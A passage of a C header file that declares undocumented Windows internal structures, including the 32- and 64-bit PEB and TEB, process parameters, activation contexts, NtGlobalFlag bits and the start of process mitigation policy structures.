AnsiCodePageData;\n    WOW64_POINTER(PVOID) OemCodePageData;\n    WOW64_POINTER(PVOID) UnicodeCaseTableData;\n\n    ULONG NumberOfProcessors;\n    ULONG NtGlobalFlag;\n\n    LARGE_INTEGER CriticalSectionTimeout;\n    WOW64_POINTER(SIZE_T) HeapSegmentReserve;\n    WOW64_POINTER(SIZE_T) HeapSegmentCommit;\n    WOW64_POINTER(SIZE_T) HeapDeCommitTotalFreeThreshold;\n    WOW64_POINTER(SIZE_T) HeapDeCommitFreeBlockThreshold;\n\n    ULONG NumberOfHeaps;\n    ULONG MaximumNumberOfHeaps;\n    WOW64_POINTER(PPVOID) ProcessHeaps;\n\n    WOW64_POINTER(PVOID) GdiSharedHandleTable;\n    WOW64_POINTER(PVOID) ProcessStarterHelper;\n    ULONG GdiDCAttributeList;\n\n    WOW64_POINTER(PRTL_CRITICAL_SECTION) LoaderLock;\n\n    ULONG OSMajorVersion;\n    ULONG OSMinorVersion;\n    USHORT OSBuildNumber;\n    USHORT OSCSDVersion;\n    ULONG OSPlatformId;\n    ULONG ImageSubsystem;\n    ULONG ImageSubsystemMajorVersion;\n    ULONG ImageSubsystemMinorVersion;\n    WOW64_POINTER(ULONG_PTR) ImageProcessAffinityMask;\n    GDI_HANDLE_BUFFER32 GdiHandleBuffer;\n    WOW64_POINTER(PVOID) PostProcessInitRoutine;\n\n    WOW64_POINTER(PVOID) TlsExpansionBitmap;\n    ULONG TlsExpansionBitmapBits[32];\n\n    ULONG 
SessionId;\n\n    // Rest of structure not included.\n} PEB32, *PPEB32;\n\n#define GDI_BATCH_BUFFER_SIZE 310\n\ntypedef struct _GDI_TEB_BATCH32 {\n    ULONG Offset;\n    WOW64_POINTER(ULONG_PTR) HDC;\n    ULONG Buffer[GDI_BATCH_BUFFER_SIZE];\n} GDI_TEB_BATCH32, *PGDI_TEB_BATCH32;\n\n#if (_MSC_VER < 1300) && !defined(_WINDOWS_)\n//\n// 32 and 64 bit specific version for wow64 and the debugger\n//\ntypedef struct _NT_TIB32 {\n    DWORD ExceptionList;\n    DWORD StackBase;\n    DWORD StackLimit;\n    DWORD SubSystemTib;\n    union {\n        DWORD FiberData;\n        DWORD Version;\n    };\n    DWORD ArbitraryUserPointer;\n    DWORD Self;\n} NT_TIB32, *PNT_TIB32;\n\ntypedef struct _NT_TIB64 {\n    DWORD64 ExceptionList;\n    DWORD64 StackBase;\n    DWORD64 StackLimit;\n    DWORD64 SubSystemTib;\n    union {\n        DWORD64 FiberData;\n        DWORD Version;\n    };\n    DWORD64 ArbitraryUserPointer;\n    DWORD64 Self;\n} NT_TIB64, *PNT_TIB64;\n#endif\n\ntypedef struct _TEB32 {\n    NT_TIB32 NtTib;\n\n    WOW64_POINTER(PVOID) EnvironmentPointer;\n    CLIENT_ID32 ClientId;\n    WOW64_POINTER(PVOID) ActiveRpcHandle;\n    WOW64_POINTER(PVOID) ThreadLocalStoragePointer;\n    WOW64_POINTER(PPEB) ProcessEnvironmentBlock;\n\n    ULONG LastErrorValue;\n    ULONG CountOfOwnedCriticalSections;\n    WOW64_POINTER(PVOID) CsrClientThread;\n    WOW64_POINTER(PVOID) Win32ThreadInfo;\n    ULONG User32Reserved[26];\n    ULONG UserReserved[5];\n    WOW64_POINTER(PVOID) WOW32Reserved;\n    LCID CurrentLocale;\n    ULONG FpSoftwareStatusRegister;\n    WOW64_POINTER(PVOID) SystemReserved1[54];\n    NTSTATUS ExceptionCode;\n    WOW64_POINTER(PVOID) ActivationContextStackPointer;\n    BYTE SpareBytes[36];\n    ULONG TxFsContext;\n\n    GDI_TEB_BATCH32 GdiTebBatch;\n    CLIENT_ID32 RealClientId;\n    WOW64_POINTER(HANDLE) GdiCachedProcessHandle;\n    ULONG GdiClientPID;\n    ULONG GdiClientTID;\n    WOW64_POINTER(PVOID) GdiThreadLocalInfo;\n    WOW64_POINTER(ULONG_PTR) Win32ClientInfo[62];\n 
   WOW64_POINTER(PVOID) glDispatchTable[233];\n    WOW64_POINTER(ULONG_PTR) glReserved1[29];\n    WOW64_POINTER(PVOID) glReserved2;\n    WOW64_POINTER(PVOID) glSectionInfo;\n    WOW64_POINTER(PVOID) glSection;\n    WOW64_POINTER(PVOID) glTable;\n    WOW64_POINTER(PVOID) glCurrentRC;\n    WOW64_POINTER(PVOID) glContext;\n\n    NTSTATUS LastStatusValue;\n    UNICODE_STRING32 StaticUnicodeString;\n    WCHAR StaticUnicodeBuffer[261];\n\n    WOW64_POINTER(PVOID) DeallocationStack;\n    WOW64_POINTER(PVOID) TlsSlots[64];\n    LIST_ENTRY32 TlsLinks;\n} TEB32, *PTEB32;\n\ntypedef struct _PEB_LDR_DATA {\n    ULONG Length;\n    BOOLEAN Initialized;\n    HANDLE SsHandle;\n    LIST_ENTRY InLoadOrderModuleList;\n    LIST_ENTRY InMemoryOrderModuleList;\n    LIST_ENTRY InInitializationOrderModuleList;\n    PVOID EntryInProgress;\n    BOOLEAN ShutdownInProgress;\n    HANDLE ShutdownThreadId;\n} PEB_LDR_DATA, *PPEB_LDR_DATA;\n\n#ifndef FLS_MAXIMUM_AVAILABLE\n#define FLS_MAXIMUM_AVAILABLE 128\n#endif\n\n#ifndef TLS_MINIMUM_AVAILABLE\n#define TLS_MINIMUM_AVAILABLE 64\n#endif\n\n#ifndef TLS_EXPANSION_SLOTS\n#define TLS_EXPANSION_SLOTS 1024\n#endif\n\n#ifndef DOS_MAX_COMPONENT_LENGTH\n#define DOS_MAX_COMPONENT_LENGTH 255\n#endif\n\n#ifndef DOS_MAX_PATH_LENGTH\n#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5)\n#endif\n\ntypedef struct _ACTIVATION_CONTEXT_DATA * PACTIVATION_CONTEXT_DATA;\ntypedef struct _ASSEMBLY_STORAGE_MAP * PASSEMBLY_STORAGE_MAP;\n\ntypedef struct _CURDIR {\n    UNICODE_STRING DosPath;\n    HANDLE Handle;\n} CURDIR, *PCURDIR;\n\n#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002\n#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003\n\ntypedef struct _RTL_DRIVE_LETTER_CURDIR {\n    USHORT Flags;\n    USHORT Length;\n    ULONG TimeStamp;\n    STRING DosPath;\n} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;\n\ntypedef struct _RTL_USER_PROCESS_PARAMETERS {\n    ULONG MaximumLength;\n    ULONG Length;\n\n    ULONG Flags;\n    ULONG DebugFlags;\n\n    HANDLE 
ConsoleHandle;\n    ULONG ConsoleFlags;\n    HANDLE StandardInput;\n    HANDLE StandardOutput;\n    HANDLE StandardError;\n\n    CURDIR CurrentDirectory;\n    UNICODE_STRING DllPath;\n    UNICODE_STRING ImagePathName;\n    UNICODE_STRING CommandLine;\n    PVOID Environment;\n\n    ULONG StartingX;\n    ULONG StartingY;\n    ULONG CountX;\n    ULONG CountY;\n    ULONG CountCharsX;\n    ULONG CountCharsY;\n    ULONG FillAttribute;\n\n    ULONG WindowFlags;\n    ULONG ShowWindowFlags;\n    UNICODE_STRING WindowTitle;\n    UNICODE_STRING DesktopInfo;\n    UNICODE_STRING ShellInfo;\n    UNICODE_STRING RuntimeData;\n    RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];\n\n    ULONG_PTR EnvironmentSize;\n    ULONG_PTR EnvironmentVersion;\n\n    PVOID PackageDependencyData;\n    ULONG ProcessGroupId;\n    ULONG LoaderThreads;\n\n    UNICODE_STRING RedirectionDllName; // RS4\n    UNICODE_STRING HeapPartitionName; // 19H1\n    ULONG_PTR DefaultThreadpoolCpuSetMasks;\n    ULONG DefaultThreadpoolCpuSetMaskCount;\n    ULONG DefaultThreadpoolThreadMaximum;\n    ULONG HeapMemoryTypeMask; // WIN11\n} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;\n\n#define FLG_STOP_ON_EXCEPTION 0x00000001\n#define FLG_SHOW_LDR_SNAPS 0x00000002 \n#define FLG_DEBUG_INITIAL_COMMAND 0x00000004 \n#define FLG_STOP_ON_HUNG_GUI 0x00000008 \n#define FLG_HEAP_ENABLE_TAIL_CHECK 0x00000010\n#define FLG_HEAP_ENABLE_FREE_CHECK 0x00000020\n#define FLG_HEAP_VALIDATE_PARAMETERS 0x00000040\n#define FLG_HEAP_VALIDATE_ALL 0x00000080\n#define FLG_APPLICATION_VERIFIER 0x00000100\n#define FLG_MONITOR_SILENT_PROCESS_EXIT 0x00000200\n#define FLG_POOL_ENABLE_TAGGING 0x00000400\n#define FLG_HEAP_ENABLE_TAGGING 0x00000800\n#define FLG_USER_STACK_TRACE_DB 0x00001000 \n#define FLG_KERNEL_STACK_TRACE_DB 0x00002000\n#define FLG_MAINTAIN_OBJECT_TYPELIST 0x00004000\n#define FLG_HEAP_ENABLE_TAG_BY_DLL 0x00008000\n#define FLG_DISABLE_STACK_EXTENSION 0x00010000 \n#define FLG_ENABLE_CSRDEBUG 
0x00020000\n#define FLG_ENABLE_KDEBUG_SYMBOL_LOAD 0x00040000 \n#define FLG_DISABLE_PAGE_KERNEL_STACKS 0x00080000\n#define FLG_ENABLE_SYSTEM_CRIT_BREAKS 0x00100000\n#define FLG_HEAP_DISABLE_COALESCING 0x00200000 \n#define FLG_ENABLE_CLOSE_EXCEPTIONS 0x00400000 \n#define FLG_ENABLE_EXCEPTION_LOGGING 0x00800000\n#define FLG_ENABLE_HANDLE_TYPE_TAGGING 0x01000000 \n#define FLG_HEAP_PAGE_ALLOCS 0x02000000\n#define FLG_DEBUG_INITIAL_COMMAND_EX 0x04000000 \n#define FLG_DISABLE_DBGPRINT 0x08000000\n#define FLG_CRITSEC_EVENT_CREATION 0x10000000 \n#define FLG_LDR_TOP_DOWN 0x20000000 \n#define FLG_ENABLE_HANDLE_EXCEPTIONS 0x40000000\n#define FLG_DISABLE_PROTDLLS 0x80000000\n\ntypedef struct _PEB {\n    BOOLEAN InheritedAddressSpace;\n    BOOLEAN ReadImageFileExecOptions;\n    BOOLEAN BeingDebugged;\n    union\n    {\n        BOOLEAN BitField;\n        struct\n        {\n            BOOLEAN ImageUsesLargePages : 1;\n            BOOLEAN IsProtectedProcess : 1;\n            BOOLEAN IsImageDynamicallyRelocated : 1;\n            BOOLEAN SkipPatchingUser32Forwarders : 1;\n            BOOLEAN IsPackagedProcess : 1;\n            BOOLEAN IsAppContainer : 1;\n            BOOLEAN IsProtectedProcessLight : 1;\n            BOOLEAN IsLongPathAwareProcess : 1;\n        };\n    };\n\n    HANDLE Mutant;\n\n    PVOID ImageBaseAddress;\n    PPEB_LDR_DATA Ldr;\n    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;\n    PVOID SubSystemData;\n    PVOID ProcessHeap;\n    PRTL_CRITICAL_SECTION FastPebLock;\n    PSLIST_HEADER AtlThunkSListPtr;\n    PVOID IFEOKey;\n\n    union\n    {\n        ULONG CrossProcessFlags;\n        struct\n        {\n            ULONG ProcessInJob : 1;\n            ULONG ProcessInitializing : 1;\n            ULONG ProcessUsingVEH : 1;\n            ULONG ProcessUsingVCH : 1;\n            ULONG ProcessUsingFTH : 1;\n            ULONG ProcessPreviouslyThrottled : 1;\n            ULONG ProcessCurrentlyThrottled : 1;\n            ULONG ProcessImagesHotPatched : 1; // RS5\n          
  ULONG ReservedBits0 : 24;\n        };\n    };\n    union\n    {\n        PVOID KernelCallbackTable;\n        PVOID UserSharedInfoPtr;\n    };\n    ULONG SystemReserved;\n    ULONG AtlThunkSListPtr32;\n    PVOID ApiSetMap;\n    ULONG TlsExpansionCounter;\n    PVOID TlsBitmap;\n    ULONG TlsBitmapBits[2];\n\n    PVOID ReadOnlySharedMemoryBase;\n    struct _SILO_USER_SHARED_DATA* SharedData;\n    PVOID* ReadOnlyStaticServerData;\n\n    PVOID AnsiCodePageData;\n    PVOID OemCodePageData;\n    PVOID UnicodeCaseTableData;\n\n    ULONG NumberOfProcessors;\n    union\n    {\n        ULONG NtGlobalFlag;\n        struct\n        {\n            ULONG StopOnException : 1;          // FLG_STOP_ON_EXCEPTION\n            ULONG ShowLoaderSnaps : 1;          // FLG_SHOW_LDR_SNAPS\n            ULONG DebugInitialCommand : 1;      // FLG_DEBUG_INITIAL_COMMAND\n            ULONG StopOnHungGUI : 1;            // FLG_STOP_ON_HUNG_GUI\n            ULONG HeapEnableTailCheck : 1;      // FLG_HEAP_ENABLE_TAIL_CHECK\n            ULONG HeapEnableFreeCheck : 1;      // FLG_HEAP_ENABLE_FREE_CHECK\n            ULONG HeapValidateParameters : 1;   // FLG_HEAP_VALIDATE_PARAMETERS\n            ULONG HeapValidateAll : 1;          // FLG_HEAP_VALIDATE_ALL\n            ULONG ApplicationVerifier : 1;      // FLG_APPLICATION_VERIFIER\n            ULONG MonitorSilentProcessExit : 1; // FLG_MONITOR_SILENT_PROCESS_EXIT\n            ULONG PoolEnableTagging : 1;        // FLG_POOL_ENABLE_TAGGING\n            ULONG HeapEnableTagging : 1;        // FLG_HEAP_ENABLE_TAGGING\n            ULONG UserStackTraceDb : 1;         // FLG_USER_STACK_TRACE_DB\n            ULONG KernelStackTraceDb : 1;       // FLG_KERNEL_STACK_TRACE_DB\n            ULONG MaintainObjectTypeList : 1;   // FLG_MAINTAIN_OBJECT_TYPELIST\n            ULONG HeapEnableTagByDll : 1;       // FLG_HEAP_ENABLE_TAG_BY_DLL\n            ULONG DisableStackExtension : 1;    // FLG_DISABLE_STACK_EXTENSION\n            ULONG EnableCsrDebug : 1;           // 
FLG_ENABLE_CSRDEBUG\n            ULONG EnableKDebugSymbolLoad : 1;   // FLG_ENABLE_KDEBUG_SYMBOL_LOAD\n            ULONG DisablePageKernelStacks : 1;  // FLG_DISABLE_PAGE_KERNEL_STACKS\n            ULONG EnableSystemCritBreaks : 1;   // FLG_ENABLE_SYSTEM_CRIT_BREAKS\n            ULONG HeapDisableCoalescing : 1;    // FLG_HEAP_DISABLE_COALESCING\n            ULONG EnableCloseExceptions : 1;    // FLG_ENABLE_CLOSE_EXCEPTIONS\n            ULONG EnableExceptionLogging : 1;   // FLG_ENABLE_EXCEPTION_LOGGING\n            ULONG EnableHandleTypeTagging : 1;  // FLG_ENABLE_HANDLE_TYPE_TAGGING\n            ULONG HeapPageAllocs : 1;           // FLG_HEAP_PAGE_ALLOCS\n            ULONG DebugInitialCommandEx : 1;    // FLG_DEBUG_INITIAL_COMMAND_EX\n            ULONG DisableDbgPrint : 1;          // FLG_DISABLE_DBGPRINT\n            ULONG CritSecEventCreation : 1;     // FLG_CRITSEC_EVENT_CREATION\n            ULONG LdrTopDown : 1;               // FLG_LDR_TOP_DOWN\n            ULONG EnableHandleExceptions : 1;   // FLG_ENABLE_HANDLE_EXCEPTIONS\n            ULONG DisableProtDlls : 1;          // FLG_DISABLE_PROTDLLS\n        } NtGlobalFlags;\n    };\n\n    ULARGE_INTEGER CriticalSectionTimeout;\n    SIZE_T HeapSegmentReserve;\n    SIZE_T HeapSegmentCommit;\n    SIZE_T HeapDeCommitTotalFreeThreshold;\n    SIZE_T HeapDeCommitFreeBlockThreshold;\n\n    ULONG NumberOfHeaps;\n    ULONG MaximumNumberOfHeaps;\n    PVOID* ProcessHeaps;\n\n    PVOID GdiSharedHandleTable;\n    PVOID ProcessStarterHelper;\n    ULONG GdiDCAttributeList;\n\n    PRTL_CRITICAL_SECTION LoaderLock;\n\n    ULONG OSMajorVersion;\n    ULONG OSMinorVersion;\n    USHORT OSBuildNumber;\n    USHORT OSCSDVersion;\n    ULONG OSPlatformId;\n    ULONG ImageSubsystem;\n    ULONG ImageSubsystemMajorVersion;\n    ULONG ImageSubsystemMinorVersion;\n    KAFFINITY ActiveProcessAffinityMask;\n    GDI_HANDLE_BUFFER GdiHandleBuffer;\n    PVOID PostProcessInitRoutine;\n\n    PVOID TlsExpansionBitmap;\n    ULONG 
TlsExpansionBitmapBits[32];\n\n    ULONG SessionId;\n\n    ULARGE_INTEGER AppCompatFlags;\n    ULARGE_INTEGER AppCompatFlagsUser;\n    PVOID pShimData;\n    PVOID AppCompatInfo;\n\n    UNICODE_STRING CSDVersion;\n\n    PACTIVATION_CONTEXT_DATA ActivationContextData;\n    PASSEMBLY_STORAGE_MAP ProcessAssemblyStorageMap;\n    PACTIVATION_CONTEXT_DATA SystemDefaultActivationContextData;\n    PASSEMBLY_STORAGE_MAP SystemAssemblyStorageMap;\n\n    SIZE_T MinimumStackCommit;\n\n    PVOID SparePointers[2];\n    PVOID PatchLoaderData;\n    PVOID ChpeV2ProcessInfo; \n\n    ULONG AppModelFeatureState;\n    ULONG SpareUlongs[2];\n\n    USHORT ActiveCodePage;\n    USHORT OemCodePage;\n    USHORT UseCaseMapping;\n    USHORT UnusedNlsField;\n\n    PVOID WerRegistrationData;\n    PVOID WerShipAssertPtr;\n\n    union\n    {\n        PVOID pContextData;\n        PVOID pUnused;\n        PVOID EcCodeBitMap;\n    };\n\n    PVOID pImageHeaderHash;\n    union\n    {\n        ULONG TracingFlags;\n        struct\n        {\n            ULONG HeapTracingEnabled : 1;\n            ULONG CritSecTracingEnabled : 1;\n            ULONG LibLoaderTracingEnabled : 1;\n            ULONG SpareTracingBits : 29;\n        };\n    };\n    ULONGLONG CsrServerReadOnlySharedMemoryBase;\n    PRTL_CRITICAL_SECTION TppWorkerpListLock;\n    LIST_ENTRY TppWorkerpList;\n    PVOID WaitOnAddressHashTable[128];\n    PVOID TelemetryCoverageHeader; // RS3\n    ULONG CloudFileFlags;\n    ULONG CloudFileDiagFlags; // RS4\n    CHAR PlaceholderCompatibilityMode;\n    CHAR PlaceholderCompatibilityModeReserved[7];\n    struct _LEAP_SECOND_DATA* LeapSecondData; // RS5\n    union\n    {\n        ULONG LeapSecondFlags;\n        struct\n        {\n            ULONG SixtySecondEnabled : 1;\n            ULONG Reserved : 31;\n        };\n    };\n    ULONG NtGlobalFlag2;\n    ULONGLONG ExtendedFeatureDisableMask; // since WIN11\n} PEB, * PPEB;\n\ntypedef struct _TEB_ACTIVE_FRAME_CONTEXT {\n    ULONG Flags;\n    PCSTR FrameName;\n} 
TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;\n\ntypedef struct _TEB_ACTIVE_FRAME {\n    ULONG Flags;\n    struct _TEB_ACTIVE_FRAME *Previous;\n    PTEB_ACTIVE_FRAME_CONTEXT Context;\n} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;\n\n#define GDI_BATCH_BUFFER_SIZE 310\n\ntypedef struct _GDI_TEB_BATCH {\n    ULONG\tOffset;\n    UCHAR\tAlignment[4];\n    ULONG_PTR HDC;\n    ULONG\tBuffer[GDI_BATCH_BUFFER_SIZE];\n} GDI_TEB_BATCH, *PGDI_TEB_BATCH;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA {\n    ULONG Magic; //'xtcA'\n    ULONG HeaderSize;\n    ULONG FormatVersion;\n    ULONG TotalSize;\n    ULONG DefaultTocOffset;\n    ULONG ExtendedTocOffset;\n    ULONG AssemblyRosterOffset; \n    ULONG Flags;\n} ACTIVATION_CONTEXT_DATA, * PACTIVATION_CONTEXT_DATA;\n\ntypedef struct _ASSEMBLY_STORAGE_MAP_ENTRY {\n    ULONG Flags;\n    UNICODE_STRING DosPath;\n    HANDLE Handle;\n} ASSEMBLY_STORAGE_MAP_ENTRY, * PASSEMBLY_STORAGE_MAP_ENTRY;\n\ntypedef struct _ASSEMBLY_STORAGE_MAP {\n    ULONG Flags;\n    ULONG AssemblyCount;\n    PASSEMBLY_STORAGE_MAP_ENTRY* AssemblyArray;\n} ASSEMBLY_STORAGE_MAP, * PASSEMBLY_STORAGE_MAP;\n\ntypedef VOID(NTAPI* PACTIVATION_CONTEXT_NOTIFY_ROUTINE)(\n    _In_ ULONG NotificationType,\n    _In_ struct _ACTIVATION_CONTEXT* ActivationContext,\n    _In_ PACTIVATION_CONTEXT_DATA ActivationContextData,\n    _In_opt_ PVOID NotificationContext,\n    _In_opt_ PVOID NotificationData,\n    _Inout_ PBOOLEAN DisableThisNotification\n    );\n\ntypedef struct _ACTIVATION_CONTEXT {\n    ULONG RefCount;\n    ULONG Flags;\n    LIST_ENTRY Links;\n    ACTIVATION_CONTEXT_DATA* ActivationContextData;\n    PACTIVATION_CONTEXT_NOTIFY_ROUTINE NotificationRoutine;\n    PVOID NotificationContext;\n    ULONG SendNotifications[4];\n    ULONG DisabledNotifications[4];\n    ASSEMBLY_STORAGE_MAP StorageMap;\n    ASSEMBLY_STORAGE_MAP_ENTRY* InlineStorageMapEntries;\n    ULONG StackTraceIndex;\n    PVOID StackTraces[4][4];\n} ACTIVATION_CONTEXT, * PACTIVATION_CONTEXT;\n\ntypedef struct 
_RTL_ACTIVATION_CONTEXT_STACK_FRAME {\n    struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;\n    PACTIVATION_CONTEXT ActivationContext;\n    ULONG Flags;\n} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;\n\ntypedef struct _ACTIVATION_CONTEXT_STACK {\n    PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;\n    LIST_ENTRY FrameListCache;\n    ULONG Flags;\n    ULONG NextCookieSequenceNumber;\n    ULONG StackId;\n} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;\n\ntypedef struct _TEB {\n    NT_TIB NtTib;\n\n    PVOID EnvironmentPointer;\n    CLIENT_ID ClientId;\n    PVOID ActiveRpcHandle;\n    PVOID ThreadLocalStoragePointer;\n    PPEB ProcessEnvironmentBlock;\n\n    ULONG LastErrorValue;\n    ULONG CountOfOwnedCriticalSections;\n    PVOID CsrClientThread;\n    PVOID Win32ThreadInfo;\n    ULONG User32Reserved[26];\n    ULONG UserReserved[5];\n    PVOID WOW32Reserved;\n    LCID CurrentLocale;\n    ULONG FpSoftwareStatusRegister;\n    PVOID ReservedForDebuggerInstrumentation[16];\n#ifdef _WIN64\n    PVOID SystemReserved1[30];\n#else\n    PVOID SystemReserved1[26];\n#endif\n\n    CHAR PlaceholderCompatibilityMode;\n    BOOLEAN PlaceholderHydrationAlwaysExplicit;\n    CHAR PlaceholderReserved[10];\n\n    ULONG ProxiedProcessId;\n    ACTIVATION_CONTEXT_STACK ActivationStack;\n\n    UCHAR WorkingOnBehalfTicket[8];\n    NTSTATUS ExceptionCode;\n\n    PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;\n    ULONG_PTR InstrumentationCallbackSp;\n    ULONG_PTR InstrumentationCallbackPreviousPc;\n    ULONG_PTR InstrumentationCallbackPreviousSp;\n#ifdef _WIN64\n    ULONG TxFsContext;\n#endif\n\n    BOOLEAN InstrumentationCallbackDisabled;\n#ifdef _WIN64\n    BOOLEAN UnalignedLoadStoreExceptions;\n#endif\n#ifndef _WIN64\n    UCHAR SpareBytes[23];\n    ULONG TxFsContext;\n#endif\n    GDI_TEB_BATCH GdiTebBatch;\n    CLIENT_ID RealClientId;\n    HANDLE GdiCachedProcessHandle;\n    ULONG GdiClientPID;\n    ULONG GdiClientTID;\n    PVOID 
GdiThreadLocalInfo;\n    ULONG_PTR Win32ClientInfo[62];\n    PVOID glDispatchTable[233];\n    ULONG_PTR glReserved1[29];\n    PVOID glReserved2;\n    PVOID glSectionInfo;\n    PVOID glSection;\n    PVOID glTable;\n    PVOID glCurrentRC;\n    PVOID glContext;\n\n    NTSTATUS LastStatusValue;\n    UNICODE_STRING StaticUnicodeString;\n    WCHAR StaticUnicodeBuffer[261];\n\n    PVOID DeallocationStack;\n    PVOID TlsSlots[64];\n    LIST_ENTRY TlsLinks;\n\n    PVOID Vdm;\n    PVOID ReservedForNtRpc;\n    PVOID DbgSsReserved[2];\n\n    ULONG HardErrorMode;\n#ifdef _WIN64\n    PVOID Instrumentation[11];\n#else\n    PVOID Instrumentation[9];\n#endif\n    GUID ActivityId;\n\n    PVOID SubProcessTag;\n    PVOID PerflibData;\n    PVOID EtwTraceData;\n    PVOID WinSockData;\n    ULONG GdiBatchCount;\n\n    union\n    {\n        PROCESSOR_NUMBER CurrentIdealProcessor;\n        ULONG IdealProcessorValue;\n        struct\n        {\n            UCHAR ReservedPad0;\n            UCHAR ReservedPad1;\n            UCHAR ReservedPad2;\n            UCHAR IdealProcessor;\n        };\n    };\n\n    ULONG GuaranteedStackBytes;\n    PVOID ReservedForPerf;\n    PVOID ReservedForOle; // tagSOleTlsData\n    ULONG WaitingOnLoaderLock;\n    PVOID SavedPriorityState;\n    ULONG_PTR ReservedForCodeCoverage;\n    PVOID ThreadPoolData;\n    PVOID* TlsExpansionSlots;\n#ifdef _WIN64\n    PVOID DeallocationBStore;\n    PVOID BStoreLimit;\n#endif\n    ULONG MuiGeneration;\n    ULONG IsImpersonating;\n    PVOID NlsCache;\n    PVOID pShimData;\n    ULONG HeapData;\n    HANDLE CurrentTransactionHandle;\n    PTEB_ACTIVE_FRAME ActiveFrame;\n    PVOID FlsData;\n\n    PVOID PreferredLanguages;\n    PVOID UserPrefLanguages;\n    PVOID MergedPrefLanguages;\n    ULONG MuiImpersonation;\n\n    union\n    {\n        USHORT CrossTebFlags;\n        USHORT SpareCrossTebBits : 16;\n    };\n    union\n    {\n        USHORT SameTebFlags;\n        struct\n        {\n            USHORT SafeThunkCall : 1;\n            
USHORT InDebugPrint : 1;\n            USHORT HasFiberData : 1;\n            USHORT SkipThreadAttach : 1;\n            USHORT WerInShipAssertCode : 1;\n            USHORT RanProcessInit : 1;\n            USHORT ClonedThread : 1;\n            USHORT SuppressDebugMsg : 1;\n            USHORT DisableUserStackWalk : 1;\n            USHORT RtlExceptionAttached : 1;\n            USHORT InitialThread : 1;\n            USHORT SessionAware : 1;\n            USHORT LoadOwner : 1;\n            USHORT LoaderWorker : 1;\n            USHORT SkipLoaderInit : 1;\n            USHORT SkipFileAPIBrokering : 1;\n        };\n    };\n\n    PVOID TxnScopeEnterCallback;\n    PVOID TxnScopeExitCallback;\n    PVOID TxnScopeContext;\n    ULONG LockCount;\n    LONG WowTebOffset;\n    PVOID ResourceRetValue;\n    PVOID ReservedForWdf;\n    ULONGLONG ReservedForCrt;\n    GUID EffectiveContainerId;\n    ULONGLONG LastSleepCounter;\n    ULONG SpinCallCount;\n    ULONGLONG ExtendedFeatureDisableMask;\n} TEB, * PTEB;\n\ntypedef struct _PROCESS_DEVICEMAP_INFORMATION {\n    union {\n        struct {\n            HANDLE DirectoryHandle;\n        } Set;\n        struct {\n            ULONG DriveMap;\n            UCHAR DriveType[32];\n        } Query;\n    };\n} PROCESS_DEVICEMAP_INFORMATION, *PPROCESS_DEVICEMAP_INFORMATION;\n\n__inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; }\n\n/*\n** PEB/TEB END\n*/\n\n/*\n**  MITIGATION POLICY START\n*/\n\n//redefine enum\n\n#define ProcessDEPPolicy                    0\n#define ProcessASLRPolicy                   1\n#define ProcessDynamicCodePolicy            2\n#define ProcessStrictHandleCheckPolicy      3\n#define ProcessSystemCallDisablePolicy      4\n#define ProcessMitigationOptionsMask        5\n#define ProcessExtensionPointDisablePolicy  6\n#define ProcessControlFlowGuardPolicy       7\n#define ProcessSignaturePolicy              8\n#define ProcessFontDisablePolicy            9\n#define ProcessImageLoadPolicy             
 10\n#define ProcessSystemCallFilterPolicy       11\n#define ProcessPayloadRestrictionPolicy     12\n#define ProcessChildProcessPolicy           13\n#define ProcessSideChannelIsolationPolicy   14\n#define ProcessUserShadowStackPolicy        15\n#define ProcessRedirectionTrustPolicy       16\n#define ProcessUserPointerAuthPolicy        17\n#define ProcessSEHOPPolicy                  18\n\ntypedef struct tagPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 {\n    union {\n        DWORD Flags;\n        struct {\n            DWORD MicrosoftSignedOnly : 1;\n            DWORD StoreSignedOnly : 1;\n            DWORD MitigationOptIn : 1;\n            DWORD AuditMicrosoftSignedOnly : 1;\n            DWORD AuditStoreSignedOnly : 1;\n            DWORD ReservedFlags : 27;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10, *PPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 {\n    union {\n        DWORD Flags;\n        struct {\n            DWORD ProhibitDynamicCode : 1;\n            DWORD AllowThreadOptOut : 1;\n            DWORD AllowRemoteDowngrade : 1;\n            DWORD AuditProhibitDynamicCode : 1;\n            DWORD ReservedFlags : 28;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10, *PPROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 {\n    union {\n        DWORD Flags;\n        struct {\n            DWORD EnableControlFlowGuard : 1;\n            DWORD EnableExportSuppression : 1;\n            DWORD StrictMode : 1;\n            DWORD EnableXfg : 1;\n            DWORD EnableXfgAuditMode : 1;\n            DWORD ReservedFlags : 27;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n} PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10, *PPROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10;\n\ntypedef struct tagPROCESS_MITIGATION_FONT_DISABLE_POLICY_W10 {\n    
